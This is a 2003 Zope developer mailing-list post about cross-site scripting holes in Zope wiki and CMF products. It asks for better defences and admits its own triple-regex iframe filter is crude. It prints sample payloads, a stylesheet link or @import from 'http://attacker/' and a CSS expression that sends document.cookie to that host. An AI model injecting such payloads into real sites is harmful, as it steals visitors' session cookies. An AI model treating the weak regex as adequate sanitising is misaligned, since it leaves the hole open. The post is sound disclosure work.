[Zope-dev] weak examples, weak exploits

Kazuya FUKAMACHI kf@atransia.co.jp
Tue, 24 Jun 2003 00:30:55 +0900


On Mon, 23 Jun 2003 01:20:35 -0700
Jamie Heilman <jamie@audible.transient.net> wrote:

> http://exploitlabs.com/files/advisories/EXPL-A-2003-009-zope.txt
[snip]
> apps, and apart from 1 and 3 there are probably legitimate bugs there.

related issues:

CMFWiki, ZWiki, Plone and other products are also vulnerable to 3a,
as far as the site permits to anonymous users or person without good
references to write.
To cope with the matter, I stupidly put multiple string substitution.

    t = re.sub(r'(?i)<([^d>]*iframe[^>]*)>',r'<disabled \1>',t)
    t = re.sub(r'(?i)<([^d>]*iframe[^>]*)>',r'<disabled \1>',t)
    t = re.sub(r'(?i)<([^d>]*iframe[^>]*)>',r'<disabled \1>',t)

It would be appreciated if someone advices me more general
and smart way.

I know that  Zope's StructuredText itself does not handle such a case,
and that kind of implementaition may be left to each developer.
If it had ability to avoid them, it would be much better, I think.

Another example
 Following sample may allow malicious.css import from outside
of the site. Put #1 or #2 to a StructuredText page.

 #1
 <LINK rel="stylesheet" href="http://attacker/malicious.css">

 #2
 <STYLE type="text/css">
 @import url('http://attacker/malicious.css');
 </STYLE>

 # expample of malicious.css
  http://attacker/malicious.css
  body { left: expression(eval(
        'document.location="http://attacker/"+document.cookie;')) }

For example, make a 'Document' in a CMFDefault site,
and put #1 to the reply form, DiscussionItem, against the original
document, etc. It seems CMFDefault is vulnerable to this attack.

Any general remedy for that kind of exploit?

--
Kazuya Fukamachi